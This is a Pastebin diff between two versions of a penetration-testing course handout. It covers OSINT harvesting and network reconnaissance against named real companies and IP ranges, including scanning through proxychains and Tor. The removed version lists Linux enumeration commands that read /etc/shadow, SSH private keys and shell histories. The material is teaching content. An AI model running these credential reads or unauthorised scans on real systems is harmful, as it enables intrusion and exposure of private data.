View difference between Paste ID: <a href="/NUQBbF0e">NUQBbF0e</a> and <a href="/UYyx2rk4">UYyx2rk4</a> - Pastebin.com

View difference between Paste ID: NUQBbF0e and UYyx2rk4

SHOW: | | - or go back to the newest paste.

1	-	##############################
1	+	##################################
2	-	# Linux For InfoSec Pros #
2	+	# Scripting For InfoSec Pros #
3	-	# By Joe McCray #
3	+	# By Joe McCray #
4	-	##############################
4	+	##################################
5
6	-	Here is the download link for the video of the morning session:
6	+
7	-	https://s3.amazonaws.com/StrategicSec-Videos/_2015_4_18_rec-lw-us-9_233534_recording.mp4
7	+
8		##########
9	-	Here is the download link for the video of the afternoon session:
9	+
10	-	https://s3.amazonaws.com/StrategicSec-Videos/_2015_4_18_rec-lw-us-4_233632_recording.mp4
10	+
11		- Although you can get the VM to run in VirtualBox, I will not be supporting this configuration for this class.
12
13
14		##########################
15		# Download the attack VM #
16		##########################
17	-	- For this workshop you'll need the latest version of VMWare Workstation (Windows), Fusion (Mac), or Player.
17	+	https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
18		user: infosecaddicts
19	-	- A 30-day trial of Workstation 11 can be downloaded from here:
19	+	pass: infosecaddicts
20	-	- https://my.vmware.com/web/vmware/info/slug/desktop_end_user_computing/vmware_workstation/11_0
20	+
21
22	-	- A 30-day trial of Fusion 7 can be downloaded from here:
22	+
23	-	- https://my.vmware.com/web/vmware/info/slug/desktop_end_user_computing/vmware_fusion/7_0
23	+
24
25	-	- The newest version of VMWare Player can be downloaded from here:
25	+
26	-	- https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_player/7_0
26	+
27		########################################
28		# Boot up the StrategicSec Ubuntu host #
29		# You can also boot up the Win7 as well#
30		########################################
31
32		- Log in to your Ubuntu host with the following credentials:
33		user: strategicsec
34		pass: strategicsec
35	-	https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu14.zip
35	+
36	-	user: strategicsec
36	+
37	-	pass: strategicsec
37	+
38		- I prefer to use Putty to SSH into my Ubuntu host on pentests and I'll be teaching this class in the same manner that I do pentests.
39		- You can download Putty from here:
40		- http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
41
42
43		- For the purpose of this workshop 192.168.230.128 is my Ubuntu IP address so anytime you see that IP you'll know that's my Ubuntu host
44
45
46		Email Harvesting
47		----------------
48
49		cd ~/toolz/
50
51		rm -rf theharvester-read-only/
52
53		sudo apt install -y python-pyasn1 python-pyasn1-modules git vim nmap openssh-server proxychains git-core curl zlib1g-dev build-essential libssl-dev libreadline-dev libyaml-dev libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev libcurl4-openssl-dev python-software-properties libffi-dev
54		strategicsec
55
56		pip install requests
57
58		git clone https://github.com/laramies/theHarvester.git
59
60		cd theHarvester/
61
62		python theHarvester.py
63
64		python theHarvester.py -d motorola.com -l 50 -b google
65	-	# Basic Linux Commands #
65	+
66		python theHarvester.py -d motorola.com -l 50 -b bing
67
68	-	pwd
68	+	python theHarvester.py -d motorola.com -l 50 -b linkedin
69
70	-	whereis pwd
70	+	python theHarvester.py -d motorola.com -l 50 -b pgp
71
72	-	which pwd
72	+
73
74	-	sudo find / -name pwd
74	+
75
76	-	/bin/pwd
76	+	File Meta-Data Harvesting
77		-------------------------
78	-	mkdir test
78	+
79
80	-	cd test
80	+	sudo apt-get install -y python-pip
81		strategicsec
82	-	touch one two three
82	+
83		pip install --upgrade pip
84	-	ls -l t (without pressing the Enter key, press the Tab key twice. What happens?)
84	+
85		pip install google
86	-	h (and again without pressing the Enter key, press the Tab key twice. What happens?)
86	+
87
88	-	Press the 'Up arrow key' (What happens?)
88	+	git clone https://github.com/opsdisk/metagoofil.git
89
90	-	Press 'Ctrl-A' (What happens?)
90	+	cd metagoofil/
91
92
93		python metagoofil.py -d motorola.com -t doc,pdf -l 100 -n 3 -o motorolafiles
94	-	clear (What happens?)
94	+
95		sudo apt install libimage-exiftool-perl
96	-	echo one > one
96	+
97
98	-	cat one (What happens?)
98	+	cd motorolafiles
99
100	-	man cat (What happens?)
100	+	exiftool -r *.doc \| egrep -i "Author\|Creator\|Email\|Producer\|Template" \| sort -u
101	-	q
101	+
102
103	-	cat two
103	+
104		python metagoofil.py -d [domain name] -t doc,pdf -l 100 -n 3 -o motorolafiles
105	-	cat one > two
105	+	Whereas:
106
107	-	cat two
107	+	-d : I used another domain name aside from Google.com to make it work
108		-t : I asked for the program to search two types of public documents whuch are doc and pdf files
109	-	cat one two > three
109	+	-l : I limited the search result to 100 to make the process faster
110		-n : I limited the downloads (files that are going to be downloaded to get their metadatas extracted) to only 3 to make the process faster
111	-	cat three
111	+	-o : I directed the result of the compilation t motorolafiles, which is a file located inside the metagoofil directory (~/toolz/metagoofil/motorolafiles)
112		-f : Save the html links to html_links_<TIMESTAMP>.txt file
113	-	echo four >> three
113	+
114
115	-	cat three (What happens?)
115	+
116
117	-	wc -l three
117	+
118
119	-	man wc
119	+	Github Info Harvesting
120	-	q
120	+	----------------------
121		cd ~/toolz/
122	-	cat three \| grep four
122	+
123		sudo pip install gitem
124	-	cat three \| grep one
124	+
125
126	-	man grep
126	+
127	-	q
127	+	gitem organization facebook
128
129
130	-	sudo grep eth[01] /etc/* (What happens?)
130	+	gitem repository facebook react
131
132	-	cat /etc/iftab
132	+
133		gitem --processes 4 user zpao
134
135	-	man ps
135	+	You'll probably get a message that says "Your API requests are being rate-limited"
136	-	q
136	+
137
138	-	ps
138	+	You can create an Oauth token using the link below:
139		Reference:
140	-	ps aux
140	+	https://help.github.com/articles/creating-an-access-token-for-command-line-use/
141
142	-	ps aux \| less
142	+
143		gitem -o 123f45672972c18ea0f42fc70bc8c5172b96d890 --processes 4 user zpao
144	-	Press the 'Up arrow key' (What happens?)
144	+	You'll have to use your own Oauth token
145
146	-	Press the 'Down arrow key' (What happens?)
146	+
147	-	q
147	+
148
149	-	top
149	+	Network Topology Enumeration
150		----------------------------
151
152	-	#########################################################################
152	+
153	-	# What kind of Linux am I on and how can I find out? #
153	+
154	-	# Great reference: #
154	+	wget https://raw.githubusercontent.com/leonteale/pentestpackage/master/gxfr.py
155	-	# https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ #
155	+
156	-	#########################################################################
156	+	python gxfr.py --bxfr --dns-lookup -o
157	-	What’s the distribution type? What version?
157	+	motorola.com
158	-	-------------------------------------------
158	+	[ press enter ]
159	-	cat /etc/issue
159	+	cw1kxyUgMdkECBNMb1fGqKJ9sC1lznaR20fPJeIt45Y=
160	-	cat /etc/*-release
160	+
161	-	cat /etc/lsb-release # Debian based
161	+
162	-	cat /etc/redhat-release # Redhat based
162	+
163
164		cd ~/toolz/
165
166	-	What’s the kernel version? Is it 64-bit?
166	+	wget https://dl.packetstormsecurity.net/UNIX/scanners/blindcrawl.pl
167	-	-------------------------------------------
167	+
168	-	cat /proc/version
168	+
169	-	uname -a
169	+
170	-	uname -mrs
170	+
171	-	rpm -q kernel
171	+
172	-	dmesg \| grep Linux
172	+
173	-	ls /boot \| grep vmlinuz-
173	+
174		rm -rf fierce2/
175
176		git clone https://github.com/mschwager/fierce.git
177	-	What can be learnt from the environmental variables?
177	+
178	-	----------------------------------------------------
178	+	cd fierce
179	-	cat /etc/profile
179	+
180	-	cat /etc/bashrc
180	+	sudo apt-get install -y python3-pip
181	-	cat ~/.bash_profile
181	+	strategicsec
182	-	cat ~/.bashrc
182	+
183	-	cat ~/.bash_logout
183	+	sudo pip3 install -r requirements.txt
184	-	env
184	+
185	-	set
185	+	python3 fierce.py -h
186
187		python3 fierce.py --domain motorola.com --subdomains accounts admin ads
188	-	What services are running? Which service has which user privilege?
188	+	Traverse IPs near discovered domains to search for contiguous blocks with the --traverse flag:
189	-	------------------------------------------------------------------
189	+
190	-	ps aux
190	+	python3 fierce.py --domain facebook.com --subdomains admin --traverse 10
191	-	ps -ef
191	+
192	-	top
192	+
193	-	cat /etc/services
193	+	Limit nearby IP traversal to certain domains with the --search flag:
194
195		python3 fierce.py --domain facebook.com --subdomains admin --search fb.com fb.net
196	-	Which service(s) are been running by root? Of these services, which are vulnerable - it’s worth a double check!
196	+
197	-	---------------------------------------------------------------------------------------------------------------
197	+
198	-	ps aux \| grep root
198	+	Attempt an HTTP connection on domains discovered with the --connect flag:
199	-	ps -ef \| grep root
199	+
200		python3 fierce.py --domain stackoverflow.com --subdomains mail --connect
201
202
203	-	What applications are installed? What version are they? Are they currently running?
203	+
204	-	------------------------------------------------------------------------------------
204	+
205	-	ls -alh /usr/bin/
205	+
206	-	ls -alh /sbin/
206	+	Another good way to find servers
207	-	dpkg -l
207	+	--------------------------------
208	-	dpkg --get-selections \| grep -v deinstall
208	+
209	-	rpm -qa
209	+
210	-	ls -alh /var/cache/apt/archives
210	+	wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c
211	-	ls -alh /var/cache/yum/
211	+
212		gcc ipcrawl.c -o ipcrawl
213
214	-	Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?
214	+	chmod 777 ipcrawl
215	-	------------------------------------------------------------------------------------
215	+
216	-	cat /etc/syslog.conf
216	+	./ipcrawl 148.87.1.1 148.87.1.254 (DNS forward lookup against an IP range)
217	-	cat /etc/chttp.conf
217	+
218	-	cat /etc/lighttpd.conf
218	+
219	-	cat /etc/cups/cupsd.conf
219	+
220	-	cat /etc/inetd.conf
220	+
221	-	cat /etc/apache2/apache2.conf
221	+	Check for Load Balancers
222	-	cat /etc/my.conf
222	+
223	-	cat /etc/httpd/conf/httpd.conf
223	+	Here are some command-line options to use for identifying load balancers:
224	-	cat /opt/lampp/etc/httpd.conf
224	+
225	-	ls -aRl /etc/ \| awk '$1 ~ /^.r./
225	+	dig microsoft.com
226
227		cd ~/toolz
228		wget https://raw.githubusercontent.com/craig/ge.mine.nu/master/lbd/lbd.sh
229	-	What jobs are scheduled?
229	+	chmod +x lbd.sh
230		./lbd.sh microsoft.com
231	-	crontab -l
231	+
232	-	ls -alh /var/spool/cron
232	+
233	-	ls -al /etc/ \| grep cron
233	+	git clone https://github.com/jmbr/halberd.git
234	-	ls -al /etc/cron*
234	+	cd halberd
235	-	cat /etc/cron*
235	+
236	-	cat /etc/at.allow
236	+
237	-	cat /etc/at.deny
237	+
238	-	cat /etc/cron.allow
238	+
239	-	cat /etc/cron.deny
239	+
240	-	cat /etc/crontab
240	+
241	-	cat /etc/anacrontab
241	+
242	-	cat /var/spool/cron/crontabs/root
242	+
243		Test for Web Application Firewalls (WAFs)
244		-----------------------------------------
245	-	Any plain text usernames and/or passwords?
245	+	pip install wafw00f
246	-	------------------------------------------
246	+
247	-	grep -i user [filename]
247	+	wafw00f http://strategicsec.com
248	-	grep -i pass [filename]
248	+
249	-	grep -C 5 "password" [filename]
249	+	wafw00f http://oracle.com
250	-	find . -name "*.php" -print0 \| xargs -0 grep -i -n "var $password" # Search for Joomla passwords
250	+
251
252		sudo nmap -p 80 --script http-waf-detect.nse strategicsec.com
253	-	What NIC(s) does the system have? Is it connected to another network?
253	+
254	-	---------------------------------------------------------------------
254	+
255	-	/sbin/ifconfig -a
255	+
256	-	cat /etc/network/interfaces
256	+
257	-	cat /etc/sysconfig/network
257	+
258
259
260	-	What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
260	+
261	-	------------------------------------------------------------------------------------------------------------------------
261	+
262	-	cat /etc/resolv.conf
262	+
263	-	cat /etc/sysconfig/network
263	+
264	-	cat /etc/networks
264	+	Recon-NG (Metasploit for Recon):
265	-	iptables -L
265	+	--------------------------------
266	-	hostname
266	+
267	-	dnsdomainname
267	+
268		sudo apt-get install -y git python-pip python-dnspython python-mechanize python-slowaes python-xlsxwriter python-jsonrpclib python-lxml
269	-	What other users & hosts are communicating with the system?
269	+	strategicsec
270	-	-----------------------------------------------------------
270	+
271	-	lsof -i
271	+	sudo pip install dicttoxml
272	-	lsof -i :80
272	+	strategicsec
273	-	grep 80 /etc/services
273	+
274	-	netstat -antup
274	+
275	-	netstat -antpx
275	+
276	-	netstat -tulpn
276	+	git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git
277	-	chkconfig --list
277	+	cd recon-ng
278	-	chkconfig --list \| grep 3:on
278	+	pip install PyPDF2
279	-	last
279	+	sudo pip install olefile
280	-	w
280	+	strategicsec
281		./recon-ng
282
283
284	-	Whats cached? IP and/or MAC addresses
284	+
285		At the prompt, let's type help in order to look at the commands we can use in Recon-ng.
286	-	arp -e
286	+
287	-	route
287	+	recon-ng > help
288	-	/sbin/route -nee
288	+
289
290		Note that many of these commands are nearly identical to Metasploit including back, set, use, search, show, and unset.
291	-	Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
291	+
292	-	------------------------------------------------------------------------------------------
292	+	recon-ng > [ TAB ] [ TAB ]
293	-	id
293	+
294	-	who
294	+
295	-	w
295	+
296	-	last
296	+	To see all the modules in Recon-ng, we can type:
297	-	cat /etc/passwd \| cut -d: # List of users
297	+
298	-	grep -v -E "^#" /etc/passwd \| awk -F: '$3 == 0 { print $1}' # List of super users
298	+	recon-ng > show [ TAB ] [ TAB ]
299	-	awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
299	+
300	-	cat /etc/sudoers
300	+
301	-	sudo -l
301	+
302		Ok, let's drive this thing....
303
304		recon-ng > show banner
305	-	What sensitive files can be found?
305	+
306	-	----------------------------------
306	+	recon-ng > show companies
307	-	cat /etc/passwd
307	+
308	-	cat /etc/group
308	+	recon-ng > show contacts
309	-	cat /etc/shadow
309	+
310	-	ls -alh /var/mail/
310	+	recon-ng > show credentials
311
312		recon-ng > show dashboard
313
314	-	Anything “interesting” in the home directorie(s)? If it’s possible to access
314	+	recon-ng > show domains
315	-	----------------------------------------------------------------------------
315	+
316	-	ls -ahlR /root/
316	+	recon-ng > show hosts
317	-	ls -ahlR /home/
317	+
318		recon-ng > show keys
319
320	-	Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords
320	+	recon-ng > show leaks
321	-	---------------------------------------------------------------------------------------------------------------------------
321	+
322	-	cat /var/apache2/config.inc
322	+	recon-ng > show locations
323	-	cat /var/lib/mysql/mysql/user.MYD
323	+
324	-	cat /root/anaconda-ks.cfg
324	+	recon-ng > show modules
325
326		recon-ng > show netblocks
327	-	What has the user being doing? Is there any password in plain text? What have they been edting?
327	+
328	-	-----------------------------------------------------------------------------------------------
328	+	recon-ng > show options
329	-	cat ~/.bash_history
329	+
330	-	cat ~/.nano_history
330	+	recon-ng > show ports
331	-	cat ~/.atftp_history
331	+
332	-	cat ~/.mysql_history
332	+	recon-ng > show profiles
333	-	cat ~/.php_history
333	+
334		recon-ng > show pushpins
335
336		recon-ng > show repositories
337	-	What user information can be found?
337	+
338		recon-ng > show schema
339	-	cat ~/.bashrc
339	+
340	-	cat ~/.profile
340	+	recon-ng > show vulnerabilities
341	-	cat /var/mail/root
341	+
342	-	cat /var/spool/mail/root
342	+	recon-ng > show workspaces
343
344
345	-	Can private-key information be found?
345	+
346
347	-	cat ~/.ssh/authorized_keys
347	+
348	-	cat ~/.ssh/identity.pub
348	+	When you have found a module that you would like to try the process is fairly straight forward.
349	-	cat ~/.ssh/identity
349	+
350	-	cat ~/.ssh/id_rsa.pub
350	+	Type, “use [Modulename]” to use the module
351	-	cat ~/.ssh/id_rsa
351	+
352	-	cat ~/.ssh/id_dsa.pub
352	+	Type, “show info” to view information about the module
353	-	cat ~/.ssh/id_dsa
353	+
354	-	cat /etc/ssh/ssh_config
354	+	And then, “show options” to see what variables can be set
355	-	cat /etc/ssh/sshd_config
355	+
356	-	cat /etc/ssh/ssh_host_dsa_key.pub
356	+	Set the option variables with “set [variable]”
357	-	cat /etc/ssh/ssh_host_dsa_key
357	+
358	-	cat /etc/ssh/ssh_host_rsa_key.pub
358	+	Finally, type “run” to execute the module
359	-	cat /etc/ssh/ssh_host_rsa_key
359	+
360	-	cat /etc/ssh/ssh_host_key.pub
360	+
361	-	cat /etc/ssh/ssh_host_key
361	+	******************************** Begin Day 1 Homework Part 1 ********************************
362		NOTE: Take screenshots of your performing all of the commands we've learned so far
363
364	-	Any settings/files (hidden) on website? Any settings file with database information?
364	+
365	-	------------------------------------------------------------------------------------
365	+	You must create a MS WORD document titled 'FirstName-LastName-Scripting-For-InfoSec-Day1-Basic-Linux-Pentest-Commands.docx' (ex: Joseph-McCray-Scripting-For-InfoSec-Day1-Basic-Linux-Pentest-Commands.docx).
366	-	ls -alhR /var/www/
366	+
367	-	ls -alhR /srv/www/htdocs/
367	+	You must spell you name EXACTLY as you want it spelled on your class certificate.
368	-	ls -alhR /usr/local/www/apache22/data/
368	+
369	-	ls -alhR /opt/lampp/htdocs/
369	+	IMPORTANT NOTE:
370	-	ls -alhR /var/www/html/
370	+	Your homework must be submitted via email to both (joe@strategicsec.com and gayane@strategicsec.com) by Sunday January 29th at midnight EST.
371
372
373	-	Is there anything in the log file(s) (Could help with “Local File Includes”!)
373	+	******************************** End Day 1 Homework Part 1 ********************************
374	-	-----------------------------------------------------------------------------
374	+
375	-	cat /etc/httpd/logs/access_log
375	+
376	-	cat /etc/httpd/logs/access.log
376	+
377	-	cat /etc/httpd/logs/error_log
377	+	******************************** Begin Day 1 Homework Part 2 ********************************
378	-	cat /etc/httpd/logs/error.log
378	+	NOTE: THIS IS AN ABSOLUTE REQUIREMENT FOR YOUR CPE CREDITS
379	-	cat /var/log/apache2/access_log
379	+
380	-	cat /var/log/apache2/access.log
380	+
381	-	cat /var/log/apache2/error_log
381	+	You must take screenshots of the process of you registering at least 5 API keys, as well as screenshots of you using at least 10 Recon-NG modules against a target company.
382	-	cat /var/log/apache2/error.log
382	+
383	-	cat /var/log/apache/access_log
383	+
384	-	cat /var/log/apache/access.log
384	+	You must create a MS WORD document titled 'FirstName-LastName-Scripting-For-InfoSec-Day1-Recon-NG.docx' (ex: Joseph-McCray--Scripting-For-InfoSec-Day1-Recon-NG.docx).
385	-	cat /var/log/auth.log
385	+
386	-	cat /var/log/chttp.log
386	+	You must spell you name EXACTLY as you want it spelled on your class certificate.
387	-	cat /var/log/cups/error_log
387	+
388	-	cat /var/log/dpkg.log
388	+
389	-	cat /var/log/faillog
389	+	Reference links:
390	-	cat /var/log/httpd/access_log
390	+	http://null-byte.wonderhowto.com/how-to/hack-like-pro-reconnaissance-with-recon-ng-part-1-getting-started-0169854/
391	-	cat /var/log/httpd/access.log
391	+	http://resources.infosecinstitute.com/basic-updated-guide-to-recon-ng-plus-new-modules-rundown/
392	-	cat /var/log/httpd/error_log
392	+
393	-	cat /var/log/httpd/error.log
393	+	IMPORTANT NOTE:
394	-	cat /var/log/lastlog
394	+	Your homework must be submitted via email to both (joe@strategicsec.com and gayane@strategicsec.com) by Sunday January 29th at midnight EST
395	-	cat /var/log/lighttpd/access.log
395	+
396	-	cat /var/log/lighttpd/error.log
396	+	******************************** End Day 1 Homework Part 2 ********************************
397	-	cat /var/log/lighttpd/lighttpd.access.log
397	+
398	-	cat /var/log/lighttpd/lighttpd.error.log
398	+
399	-	cat /var/log/messages
399	+
400	-	cat /var/log/secure
400	+
401	-	cat /var/log/syslog
401	+
402	-	cat /var/log/wtmp
402	+	# Scanning Methodology #
403	-	cat /var/log/xferlog
403	+
404	-	cat /var/log/yum.log
404	+
405	-	cat /var/run/utmp
405	+	- Ping Sweep
406	-	cat /var/webmin/miniserv.log
406	+	What's alive?
407	-	cat /var/www/logs/access_log
407	+	------------
408	-	cat /var/www/logs/access.log
408	+	sudo nmap -sP 157.166.226.*
409	-	ls -alh /var/lib/dhcp3/
409	+
410	-	ls -alh /var/log/postgresql/
410	+
411	-	ls -alh /var/log/proftpd/
411	+	-if -SP yields no results try:
412	-	ls -alh /var/log/samba/
412	+	sudo nmap -sL 157.166.226.*
413		strategicsec
414	-	Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp
414	+
415		- Port Scan
416		What's where?
417	-	###########################
417	+	------------
418	-	# Target IP Determination #
418	+	sudo nmap -sS 162.243.126.247
419	-	###########################
419	+
420	-	- This portion starts the actual workshop content
420	+
421	-	- Zone Transfer fails on most domains, but here is an example of one that works:
421	+
422	-	dig axfr heartinternet.co.uk @ns.heartinternet.co.uk
422	+	- Bannergrab/Version Query
423		What versions of software are running
424		-------------------------------------
425	-	- Usually you will need to do a DNS brute-force with something like blindcrawl or fierce
425	+	sudo nmap -sV 162.243.126.247
426		strategicsec
427	-	Look up the IP addresses at:
427	+
428	-	http://www.networksolutions.com/whois/index.jsp
428	+
429		- Vulnerability Research
430		Lookup the banner versions for public exploits
431	-	- Note: If you are on a different machine and need to download blindcrawl can you download it this way:
431	+	----------------------------------------------
432	-	wget dl.packetstormsecurity.net/UNIX/scanners/blindcrawl.pl
432	+	http://exploit-db.com
433		http://securityfocus.com/bid
434		https://packetstormsecurity.com/files/tags/exploit/
435
436
437	-	cd ~/toolz/fierce2
437	+
438	-	sudo apt-get install -y cpanminus cpan-listchanges cpanoutdated libappconfig-perl libyaml-appconfig-perl libnetaddr-ip-perl libnet-cidr-perl vim subversion
438	+	#######################################################
439	-	strategicsec
439	+	# Day 1: 3rd Party Scanning, and scanning via proxies #
440		#######################################################
441
442	-	- Note: Only run this 'svn co' command below if you are NOT on the strategicsec VM:
442	+	https://www.shodan.io/
443	-	svn co https://svn.assembla.com/svn/fierce/fierce2/trunk/ fierce2/
443	+
444		Create a FREE account and login
445
446	-	cd ~/toolz/fierce2
446	+	net:129.188.8.0/24
447	-	wget http://search.cpan.org/CPAN/authors/id/A/AB/ABW/Template-Toolkit-2.14.tar.gz
447	+
448	-	tar -zxvf Template-Toolkit-2.14.tar.gz
448	+
449	-	cd Template-Toolkit-2.14/
449	+
450	-	perl Makefile.PL
450	+	cd /home/strategicsec/toolz/
451	-	y
451	+	perl proxyfinder-0.3.pl multiproxy 3 proxies.txt <-- This takes a long time to run
452	-	y
452	+
453	-	n
453	+
454	-	y
454	+
455		sudo vi /etc/proxychains.conf <--- Make sure that last line of the file is: socks4 127.0.0.1 9050
456		strategicsec
457
458
459
460	-	sudo bash install.sh
460	+
461		----------------------------------------------------------------------
462		vi ~/toolz/fix-proxychains-dns.sh
463	-	./fierce
463	+
464		#!/bin/bash
465	-	./fierce -dns motorola.com
465	+	# This script is called by proxychains to resolve DNS names
466		# DNS server used to resolve names
467		# Reference: http://carnal0wnage.attackresearch.com/2013/09/changing-proxychains-hardcoded-dns.html
468		DNS_SERVER=4.2.2.2
469	-	- Note: Only run these 'wget, gcc, chmod' commands below if you are NOT on the strategicsec VM:
469	+
470	-	wget https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c
470	+	if [ $# = 0 ] ; then
471	-	gcc -o ipcrawl ipcrawl.c
471	+	echo " usage:"
472	-	chmod +x ipcrawl
472	+	echo " proxyresolv <hostname> "
473		exit
474		fi
475
476	-	- Here we do a forward lookup against an entire IP range. Basically take every IP in the range and see what it's hostname is
476	+	export LD_PRELOAD=libproxychains.so.3
477		dig $1 @$DNS_SERVER +tcp \| awk '/A.+[0-9]+\.[0-9]+\.[0-9]/{print $5;}'
478	-	./ipcrawl 148.87.1.1 148.87.1.254 (DNS forward lookup against an IP range)
478	+	-----------------------------------------------------------------------
479
480
481	-	sudo nmap -sL 148.87.1.0-255
481	+	sudo ntpdate pool.ntp.org
482		strategicsec
483
484	-	sudo nmap -sL 148.87.1.0-255 \| grep oracle
484	+	tor-resolve strategicsec.com
485
486		proxychains nmap -sT -p80 162.243.126.247
487	-	- Reference: http://blog.depthsecurity.com/2012/01/obtaining-hostdomain-names-through-ssl.html
487	+
488	-	sudo nmap -p 443,444,8443,8080,8088 --script=ssl-cert --open 144.189.100.1-254
488	+	proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,445,1433,1521,3306,3389,8080,10000 162.243.126.247
489
490	-
490	+
491
492
493
494	-	###########################
494	+
495	-	# Load Balancer Detection #
495	+
496	-	###########################
496	+
497		# Playing with Nmap NSE #
498	-	- Here are some options to use for identifying load balancers:
498	+
499	-	- http://toolbar.netcraft.com/site_report/
499	+
500	-	- Firefox LiveHTTP Headers
500	+	nmap -Pn -p80 --script ip-geolocation-* strategicsec.com
501
502		nmap -p80 --script dns-brute strategicsec.com
503	-	- Here are some command-line options to use for identifying load balancers:
503	+
504		nmap --script http-robtex-reverse-ip secore.info
505	-	dig google.com
505	+
506		nmap -Pn -p80 --script=http-headers strategicsec.com
507
508	-	./lbd-0.1.sh google.com
508	+
509		ls /usr/share/nmap/scripts \| grep http
510		nmap -Pn -p80 --script=http-* strategicsec.com
511
512
513
514		#########################
515		# Playing with Nmap NSE #
516		#########################
517
518		nmap -Pn -p80 --script ip-geolocation-* strategicsec.com
519
520	-	# Web Application Firewall Detection #
520	+
521
522		nmap --script http-robtex-reverse-ip secore.info
523	-	cd ~/toolz/wafw00f
523	+
524	-	python wafw00f.py http://www.oracle.com
524	+
525	-	python wafw00f.py http://www.strategicsec.com
525	+
526
527		ls /usr/share/nmap/scripts \| grep http
528		nmap -Pn -p80 --script=http-* strategicsec.com
529
530		############
531		# Nmap NSE #
532	-	sudo nmap -p 80 --script http-waf-detect.nse healthcare.gov
532	+
533
534		- Reference for this tutorial is:
535		https://thesprawl.org/research/writing-nse-scripts-for-vulnerability-scanning/
536
537		----------------------------------------------------------------------
538		sudo vi /usr/share/nmap/scripts/intro-nse.nse
539		strategicsec
540
541
542
543		-- The Head Section --
544		-- The Rule Section --
545		portrule = function(host, port)
546		return port.protocol == "tcp"
547		and port.number == 80
548		and port.state == "open"
549		end
550
551		-- The Action Section --
552		action = function(host, port)
553		return "I love Linux!"
554		end
555		----------------------------------------------------------------------
556
557		- Ok, now that we've made that change let's run the script
558		sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse strategicsec.com -p 22,80,443
559
560
561
562
563
564
565		----------------------------------------------------------------------
566		sudo vi /usr/share/nmap/scripts/intro-nse.nse
567
568		-- The Head Section --
569		local shortport = require "shortport"
570
571		-- The Rule Section --
572		portrule = shortport.http
573
574
575		-- The Action Section --
576		action = function(host, port)
577		return "I still love Linux!"
578		end
579		----------------------------------------------------------------------
580
581		- Ok, now that we've made that change let's run the script
582		sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse strategicsec.com -p 22,80,443
583
584
585
586
587
588
589
590		OK, now let's have some fun with my buddy Carlos Perez's website which you should have been looking at quite a lot if you were trying to get Ruby 2.1.5 working.
591
592		----------------------------------------------------------------------
593		sudo vi /usr/share/nmap/scripts/intro-nse.nse
594
595		-- The Head Section --
596		local shortport = require "shortport"
597		local http = require "http"
598
599		-- The Rule Section --
600		portrule = shortport.http
601
602		-- The Action Section --
603		action = function(host, port)
604
605		local uri = "/installing-metasploit-in-ubunt/"
606		local response = http.get(host, port, uri)
607		return response.status
608
609		end
610		----------------------------------------------------------------------
611
612		- Ok, now that we've made that change let's run the script
613		sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
614
615
616
617
618		----------------------------------------------------------------------
619		sudo vi /usr/share/nmap/scripts/intro-nse.nse
620
621		-- The Head Section --
622		local shortport = require "shortport"
623		local http = require "http"
624
625		-- The Rule Section --
626		portrule = shortport.http
627
628		-- The Action Section --
629		action = function(host, port)
630
631		local uri = "/installing-metasploit-in-ubunt/"
632		local response = http.get(host, port, uri)
633
634		if ( response.status == 200 ) then
635		return response.body
636		end
637
638		end
639		----------------------------------------------------------------------
640
641		- Ok, now that we've made that change let's run the script
642		sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
643
644
645
646
647
648
649
650
651
652		----------------------------------------------------------------------
653		sudo vi /usr/share/nmap/scripts/intro-nse.nse
654
655		-- The Head Section --
656		local shortport = require "shortport"
657		local http = require "http"
658		local string = require "string"
659
660		-- The Rule Section --
661		portrule = shortport.http
662
663		-- The Action Section --
664		action = function(host, port)
665
666		local uri = "/installing-metasploit-in-ubunt/"
667		local response = http.get(host, port, uri)
668
669		if ( response.status == 200 ) then
670		local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
671		return title
672		end
673
674		end
675		----------------------------------------------------------------------
676
677		- Ok, now that we've made that change let's run the script
678		sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
679
680
681
682
683
684
685
686		----------------------------------------------------------------------
687		sudo vi /usr/share/nmap/scripts/intro-nse.nse
688
689		-- The Head Section --
690		local shortport = require "shortport"
691		local http = require "http"
692		local string = require "string"
693
694		-- The Rule Section --
695		portrule = shortport.http
696
697		-- The Action Section --
698		action = function(host, port)
699
700		local uri = "/installing-metasploit-in-ubunt/"
701		local response = http.get(host, port, uri)
702
703		if ( response.status == 200 ) then
704		local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
705
706		if (title) then
707		return "Vulnerable"
708		else
709		return "Not Vulnerable"
710		end
711		end
712		end
713
714		----------------------------------------------------------------------
715
716		- Ok, now that we've made that change let's run the script
717		sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
718
719
720
721		####################
722		# Installing Scapy #
723		####################
724
725		sudo apt-get update
726		sudo apt-get install python-scapy python-pyx python-gnuplot python-pycryptopp python-pycryptopp-dbg python-crypto python-crypto-dbg python-cryptography
727
728
729		- Reference Page For All Of The Commands We Will Be Running:
730		http://samsclass.info/124/proj11/proj17-scapy.html
731
732
733
734
735
736		- To run Scapy interactively
737
738		sudo scapy
739
740
741
742		#####################################
743		# Sending ICMPv4 Packets with scapy #
744		#####################################
745
